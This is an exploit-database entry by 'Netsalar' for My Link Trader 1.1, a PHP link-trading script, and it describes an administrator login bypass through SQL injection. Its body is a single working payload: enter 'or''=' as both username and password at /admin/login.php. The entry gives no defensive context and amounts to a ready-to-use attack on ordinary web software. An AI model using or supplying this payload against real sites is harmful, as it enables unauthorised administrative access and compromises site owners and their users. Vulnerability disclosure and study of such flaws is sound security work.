id: 26624
date: 01/09/2017
title: My Link Trader 1.1 - Authentication Bypass Vulnerability
author: Netsalar
cves: 

######################################
# Type: login bypass via SQLi
# Vendor: http://software.friendsinwar.com/
# Script Name: My Link Trader
# Script Version: 1.1
# Software Link: http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=13
# Author: Netsalar
# Mail : netsalar@gmail[dot]com
######################################
go to /admin/login.php and set Username and Password to 'or''=' and hit enter.

#  0day.today [2023-03-26]  #